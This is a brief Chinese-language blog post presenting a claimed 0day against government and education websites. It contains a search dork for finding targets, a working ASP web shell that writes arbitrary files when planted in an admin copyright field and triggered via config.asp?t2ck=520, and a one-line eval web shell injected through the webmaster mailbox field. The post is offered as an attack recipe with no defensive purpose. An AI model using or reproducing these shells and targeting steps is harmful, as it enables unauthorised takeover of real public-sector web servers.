政府教育网站0day

inurl:printpage.asp?ArticleID=




在后台版权信息栏里写入小马
if Request("t2ck")="520" then
  dim allen,creat,text,thisline,path
  if Request("creat")="yes" then
  Set fs = CreateObject("Scripting.FileSystemObject") 
  Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
  outfile.WriteLine Request("text")
  Response.write "T2Ck安全团队"
end if
  Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?t2ck=520&creat=yes'>"
  Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
  Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
  Response.write "<input name='submit' type='submit' value='ok' ></form>"
  Response.end
  end if
  %>

别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?t2ck=520


可以在站长信箱那里写入"%><%eva(request("t2ck"))%><%' 然后直接连接inc目录下的config.asp

2015-02-01 1
评论
热度(1)